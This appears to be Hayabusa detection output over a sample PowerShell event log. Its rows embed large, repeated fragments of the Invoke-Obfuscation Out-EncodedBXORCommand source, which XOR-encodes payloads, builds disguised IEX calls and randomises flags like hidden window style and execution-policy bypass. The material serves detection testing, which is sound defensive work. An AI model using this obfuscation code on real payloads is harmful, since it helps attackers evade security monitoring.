$SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # 